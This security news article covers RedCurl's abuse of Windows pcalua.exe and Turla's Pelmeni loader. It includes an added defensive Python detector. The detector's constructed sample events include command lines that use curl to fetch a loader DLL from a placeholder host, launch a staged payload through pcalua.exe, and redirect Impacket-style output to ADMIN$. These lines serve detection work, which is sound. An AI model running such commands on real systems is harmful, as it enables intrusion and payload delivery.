RedCurl Cybercrime Group abuses Windows PCA tool for corporate espionage

March 14, 2024 | Pressroom | Cyber espionage / Malware

The Russian-speaking cybercrime group known as RedCurl is abusing a legitimate component of Microsoft Windows called Program Compatibility Assistant (PCA) to execute malicious commands.

“The Program Compatibility Assistant (pcalua.exe) is a Windows service designed to identify and resolve compatibility issues with older programs,” Trend Micro said in an analysis published this month.

“Hackers can exploit this utility to allow command execution and bypass security restrictions by using it as an alternative command line interpreter. In this investigation, the threat actor uses this tool to obscure their activities.”


RedCurl, also called Earth Kapre and Red Wolf, is known to have been active since at least 2018, orchestrating corporate cyber espionage attacks against entities located in Australia, Canada, Germany, Russia, Slovenia, the United Kingdom, Ukraine, and the United States.

In July 2023, F.A.C.C.T. revealed that a major Russian bank and an Australian company had been targeted by the threat actor in November 2022 and May 2023 to steal confidential company secrets and employee information.

The attack chain examined by Trend Micro uses phishing emails carrying malicious attachments (.ISO and .IMG files) to trigger a multi-step process: cmd.exe first downloads the legitimate utility curl from a remote server, and curl then acts as the conduit for delivering a loader (ms.dll or ps.dll).

The malicious DLL, in turn, leverages PCA to spawn a downloader process that establishes a connection to the same domain curl used to fetch the loader.

The attack also made use of the open-source software Impacket to execute unauthorized commands.
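The chain described above (curl fetching a DLL from a remote host, pcalua.exe launching the next stage, Impacket-style remote command execution) leaves distinct traces in process-creation telemetry. The following is an added detection example written for this page; it is not code from the article, from Trend Micro or from the threat actor's tooling. It applies three heuristics to constructed Sysmon-style process-creation records (image, parent image, command line). The sample events, the `example.invalid` domain, the file names, and the assumption that explorer.exe is the normal interactive parent of pcalua.exe are all illustrative; baseline the parent rule against your own environment before alerting on it.

```python
"""Heuristic detection for the curl / pcalua.exe / Impacket chain.

Added example, not the article's or Trend Micro's code. All events below are
constructed samples modelled on the chain the article describes, not real
telemetry. Field names follow Sysmon Event ID 1 (Image, ParentImage,
CommandLine) by convention only.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str   # command line of the created process


# Paths an unprivileged user (or a mounted ISO/IMG payload) can write to.
USER_WRITABLE = re.compile(r"\\(Users\\Public|Temp|AppData|ProgramData)\\", re.IGNORECASE)
# Any http(s) URL in the command line.
URL = re.compile(r"https?://\S+", re.IGNORECASE)
# Impacket wmiexec/smbexec redirect stdout to the local ADMIN$ share.
ADMIN_SHARE_REDIRECT = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\", re.IGNORECASE)

# Assumption for this example: interactive use of PCA is parented by explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of reasons an event is suspicious (empty if none)."""
    reasons = []
    img = basename(ev.image)
    parent = basename(ev.parent_image)
    cl = ev.command_line

    # Rule 1: pcalua.exe used as a proxy launcher for a staged payload.
    if img == "pcalua.exe":
        if parent not in INTERACTIVE_PARENTS:
            reasons.append(f"pcalua.exe launched by non-interactive parent {parent}")
        if USER_WRITABLE.search(cl):
            reasons.append("pcalua.exe target resides in a user-writable path")

    # Rule 2: curl pulling a DLL (the ms.dll / ps.dll loader stage) from a remote host.
    if img == "curl.exe" and URL.search(cl) and re.search(r"\.dll\b", cl, re.IGNORECASE):
        reasons.append("curl.exe fetching a DLL from a remote URL")

    # Rule 3: cmd.exe output redirected to \\127.0.0.1\ADMIN$ (Impacket wmiexec/smbexec).
    if img == "cmd.exe" and ADMIN_SHARE_REDIRECT.search(cl):
        reasons.append("cmd.exe output redirected to ADMIN$ share (Impacket pattern)")

    return reasons


def scan(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Run classify() over a batch and return (event index, reason) pairs."""
    return [(i, r) for i, ev in enumerate(events) for r in classify(ev)]


# Constructed sample events (not real telemetry); example.invalid is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              r"cmd.exe /c curl.exe -o C:\Users\Public\ms.dll http://example.invalid/ms.dll"),
    ProcEvent(r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\cmd.exe",
              r"curl.exe -o C:\Users\Public\ms.dll http://example.invalid/ms.dll"),
    ProcEvent(r"C:\Windows\System32\pcalua.exe", r"C:\Windows\System32\rundll32.exe",
              r"pcalua.exe -a C:\Users\Public\stage2.exe"),
    ProcEvent(r"C:\Windows\System32\pcalua.exe", r"C:\Windows\explorer.exe",
              r"pcalua.exe -a C:\Program Files\OldApp\setup.exe"),   # benign: user ran an old installer
    ProcEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
              r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1710000000 2>&1"),
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

Run against the samples, the curl download, the rundll32-parented pcalua.exe launch (two reasons) and the ADMIN$ redirect fire, while the interactive pcalua.exe use from Program Files and notepad.exe stay silent. The rules are deliberately narrow; in production you would join them on process lineage so that a curl download followed by a pcalua.exe launch from the same tree scores higher than either event alone.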

Connections to Earth Kapre arise from overlaps in the command and control (C2) infrastructure and similarities to known downloader artifacts used by the group.

“This case highlights the ongoing and active threat posed by Earth Kapre, an actor targeting a broad range of industries across multiple countries,” Trend Micro said.


“The perpetrator uses sophisticated tactics, such as abusing PowerShell, curl, and Program Compatibility Assistant (pcalua.exe) to execute malicious commands, demonstrating its dedication to evading detection within the targeted networks.”

The development comes as the Russia-linked nation-state group known as Turla (aka Iron Hunter, Pensive Ursa, Secret Blizzard, Snake, Uroburos, Venomous Bear and Waterbug) has begun using a new wrapper DLL codenamed Pelmeni to deliver the .NET-based Kazuar backdoor.

Pelmeni, which masquerades as libraries related to SkyTel, NVIDIA GeForce Experience, vncutil, or ASUS, is loaded via DLL side-loading. Once this fake DLL is called by the legitimate software installed on the machine, it decrypts and launches Kazuar, Lab52 said.
